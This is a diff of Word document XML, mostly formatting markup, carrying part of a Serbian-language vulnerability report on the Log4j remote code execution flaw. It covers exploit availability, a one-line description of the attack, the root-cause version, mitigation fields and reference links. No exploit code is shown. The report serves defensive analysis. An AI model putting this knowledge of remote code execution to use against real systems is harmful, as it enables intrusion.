+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Postoji</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>javno</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>dostupan</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>eksploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (Da/Ne): Da</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Opis</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>eksploita</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:t>Ranjivost nam dozvoljava da preuzmemo objekat sa udaljene ili lokalne mašine i izvršimo proizvoljni kod na ranjivoj aplikaciji.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F4D17F2" wp14:editId="3C8104D1">
+            <wp:extent cx="5654794" cy="1645920"/>
+            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
+            <wp:docPr id="1976972038" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1976972038" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill rotWithShape="1">
+                    <a:blip r:embed="rId14"/>
+                    <a:srcRect l="1410" t="45814" r="54103" b="31167"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5658265" cy="1646930"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                    <a:extLst>
+                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
+                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
+                      </a:ext>
+                    </a:extLst>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>+</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Kod</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>eksploita</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>ukoliko</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>postoji</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:pict w14:anchorId="6A333334">
+          <v:rect id="_x0000_i1033" style="width:468pt;height:1.2pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">4. Analiza </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>uzroka</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (root cause)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Uvođenje</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Greške</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (Commit/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Verzija</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Greska je </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>uvedena</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 21.09.2013. u Log4j 2.0-beta9 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>releas</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-u </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>ali</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> je </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>prvi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> put </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>objavljena</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 24.10.2021.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Primer Koda (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>ako</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> je </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>primenljivo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:pict w14:anchorId="49403FF6">
+          <v:rect id="_x0000_i1034" style="width:468pt;height:1.2pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">5. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Preporuke</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> za </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>mitigaciju</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Da li je </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>dostupan</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Vendor Fix </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>ili</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>patch  (</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Da/Ne): Da</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Mitigation Strategy:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Alternativni</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> fix (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>ukoliko</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ne </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>postoji</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>vendorski</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:hyperlink r:id="rId15" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>c</w:t>
+          <w:t>https://www.cvedetails.com/cve/CVE-2023-26031/</w:t>
         </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:hyperlink r:id="rId16" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>ve/CVE-2023-26031/</w:t>
+          <w:t>https://lists.apache.org/thread/q9qpdlv952gb4kphpndd5phvl7fkh71r</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
-    <w:p>
-      <w:hyperlink r:id="rId14" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>https://lists.apache.org/thread/</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>q</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>9qpdlv952gb4kphpndd5phvl7fkh71r</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
     <w:p/>
     <w:p>
-      <w:hyperlink r:id="rId15" w:history="1">
+      <w:hyperlink r:id="rId17" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7044,7 +8352,7 @@
       </w:hyperlink>
     </w:p>
     <w:p>
-      <w:hyperlink r:id="rId16" w:history="1">
+      <w:hyperlink r:id="rId18" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7053,6 +8361,47 @@
         </w:r>
       </w:hyperlink>
     </w:p>
+    <w:p/>
+    <w:p>
+      <w:hyperlink r:id="rId19" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>https://www.dell.com/support/contents/en-us/videos/videoplayer/tutorial-on-apache%E2%80%AFlog4j-remote-code-execution-vulnerability-avamar-server-update-for-cve-2021-44228/6287970225001</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:hyperlink r:id="rId20" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>https://www.dell.com/support/contents/en-rs/videos/videoplayer/tutorial-on-apache-log4j-dpa-security-update-for-cve-2021-44228/6288116818001</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:hyperlink r:id="rId21" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>https://www.sysdig.com/blog/exploit-detect-mitigate-log4j-cve</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve">  BITNP</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
     <w:p/>
     <w:p/>
     <w:sectPr>
@@ -8781,147 +10130,39 @@
   </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="1865708930">
     <w:abstractNumId w:val="6"/>
-    <w:lvlOverride w:ilvl="0"/>
-    <w:lvlOverride w:ilvl="1"/>
-    <w:lvlOverride w:ilvl="2"/>
-    <w:lvlOverride w:ilvl="3"/>
-    <w:lvlOverride w:ilvl="4"/>
-    <w:lvlOverride w:ilvl="5"/>
-    <w:lvlOverride w:ilvl="6"/>
-    <w:lvlOverride w:ilvl="7"/>
-    <w:lvlOverride w:ilvl="8"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="1632634527">
     <w:abstractNumId w:val="0"/>
-    <w:lvlOverride w:ilvl="0"/>
-    <w:lvlOverride w:ilvl="1"/>
-    <w:lvlOverride w:ilvl="2"/>
-    <w:lvlOverride w:ilvl="3"/>
-    <w:lvlOverride w:ilvl="4"/>
-    <w:lvlOverride w:ilvl="5"/>
-    <w:lvlOverride w:ilvl="6"/>
-    <w:lvlOverride w:ilvl="7"/>
-    <w:lvlOverride w:ilvl="8"/>
   </w:num>
   <w:num w:numId="3" w16cid:durableId="301008849">
     <w:abstractNumId w:val="1"/>
-    <w:lvlOverride w:ilvl="0"/>
-    <w:lvlOverride w:ilvl="1"/>
-    <w:lvlOverride w:ilvl="2"/>
-    <w:lvlOverride w:ilvl="3"/>
-    <w:lvlOverride w:ilvl="4"/>
-    <w:lvlOverride w:ilvl="5"/>
-    <w:lvlOverride w:ilvl="6"/>
-    <w:lvlOverride w:ilvl="7"/>
-    <w:lvlOverride w:ilvl="8"/>
   </w:num>
   <w:num w:numId="4" w16cid:durableId="273369617">
     <w:abstractNumId w:val="9"/>
-    <w:lvlOverride w:ilvl="0"/>
-    <w:lvlOverride w:ilvl="1"/>
-    <w:lvlOverride w:ilvl="2"/>
-    <w:lvlOverride w:ilvl="3"/>
-    <w:lvlOverride w:ilvl="4"/>
-    <w:lvlOverride w:ilvl="5"/>
-    <w:lvlOverride w:ilvl="6"/>
-    <w:lvlOverride w:ilvl="7"/>
-    <w:lvlOverride w:ilvl="8"/>
   </w:num>
   <w:num w:numId="5" w16cid:durableId="677124550">
     <w:abstractNumId w:val="8"/>
-    <w:lvlOverride w:ilvl="0"/>
-    <w:lvlOverride w:ilvl="1"/>
-    <w:lvlOverride w:ilvl="2"/>
-    <w:lvlOverride w:ilvl="3"/>
-    <w:lvlOverride w:ilvl="4"/>
-    <w:lvlOverride w:ilvl="5"/>
-    <w:lvlOverride w:ilvl="6"/>
-    <w:lvlOverride w:ilvl="7"/>
-    <w:lvlOverride w:ilvl="8"/>
   </w:num>
   <w:num w:numId="6" w16cid:durableId="433785808">
     <w:abstractNumId w:val="2"/>
-    <w:lvlOverride w:ilvl="0"/>
-    <w:lvlOverride w:ilvl="1"/>
-    <w:lvlOverride w:ilvl="2"/>
-    <w:lvlOverride w:ilvl="3"/>
-    <w:lvlOverride w:ilvl="4"/>
-    <w:lvlOverride w:ilvl="5"/>
-    <w:lvlOverride w:ilvl="6"/>
-    <w:lvlOverride w:ilvl="7"/>
-    <w:lvlOverride w:ilvl="8"/>
   </w:num>
   <w:num w:numId="7" w16cid:durableId="68626362">
     <w:abstractNumId w:val="5"/>
-    <w:lvlOverride w:ilvl="0"/>
-    <w:lvlOverride w:ilvl="1"/>
-    <w:lvlOverride w:ilvl="2"/>
-    <w:lvlOverride w:ilvl="3"/>
-    <w:lvlOverride w:ilvl="4"/>
-    <w:lvlOverride w:ilvl="5"/>
-    <w:lvlOverride w:ilvl="6"/>
-    <w:lvlOverride w:ilvl="7"/>
-    <w:lvlOverride w:ilvl="8"/>
   </w:num>
   <w:num w:numId="8" w16cid:durableId="80876861">
     <w:abstractNumId w:val="3"/>
-    <w:lvlOverride w:ilvl="0"/>
-    <w:lvlOverride w:ilvl="1"/>
-    <w:lvlOverride w:ilvl="2"/>
-    <w:lvlOverride w:ilvl="3"/>
-    <w:lvlOverride w:ilvl="4"/>
-    <w:lvlOverride w:ilvl="5"/>
-    <w:lvlOverride w:ilvl="6"/>
-    <w:lvlOverride w:ilvl="7"/>
-    <w:lvlOverride w:ilvl="8"/>
   </w:num>
   <w:num w:numId="9" w16cid:durableId="126318792">
     <w:abstractNumId w:val="11"/>
-    <w:lvlOverride w:ilvl="0"/>
-    <w:lvlOverride w:ilvl="1"/>
-    <w:lvlOverride w:ilvl="2"/>
-    <w:lvlOverride w:ilvl="3"/>
-    <w:lvlOverride w:ilvl="4"/>
-    <w:lvlOverride w:ilvl="5"/>
-    <w:lvlOverride w:ilvl="6"/>
-    <w:lvlOverride w:ilvl="7"/>
-    <w:lvlOverride w:ilvl="8"/>
   </w:num>
   <w:num w:numId="10" w16cid:durableId="2084598014">
     <w:abstractNumId w:val="7"/>
-    <w:lvlOverride w:ilvl="0"/>
-    <w:lvlOverride w:ilvl="1"/>
-    <w:lvlOverride w:ilvl="2"/>
-    <w:lvlOverride w:ilvl="3"/>
-    <w:lvlOverride w:ilvl="4"/>
-    <w:lvlOverride w:ilvl="5"/>
-    <w:lvlOverride w:ilvl="6"/>
-    <w:lvlOverride w:ilvl="7"/>
-    <w:lvlOverride w:ilvl="8"/>
   </w:num>
   <w:num w:numId="11" w16cid:durableId="1088112766">
     <w:abstractNumId w:val="4"/>
-    <w:lvlOverride w:ilvl="0"/>
-    <w:lvlOverride w:ilvl="1"/>
-    <w:lvlOverride w:ilvl="2"/>
-    <w:lvlOverride w:ilvl="3"/>
-    <w:lvlOverride w:ilvl="4"/>
-    <w:lvlOverride w:ilvl="5"/>
-    <w:lvlOverride w:ilvl="6"/>
-    <w:lvlOverride w:ilvl="7"/>
-    <w:lvlOverride w:ilvl="8"/>
   </w:num>
   <w:num w:numId="12" w16cid:durableId="22751591">
     <w:abstractNumId w:val="10"/>
-    <w:lvlOverride w:ilvl="0"/>
-    <w:lvlOverride w:ilvl="1"/>
-    <w:lvlOverride w:ilvl="2"/>
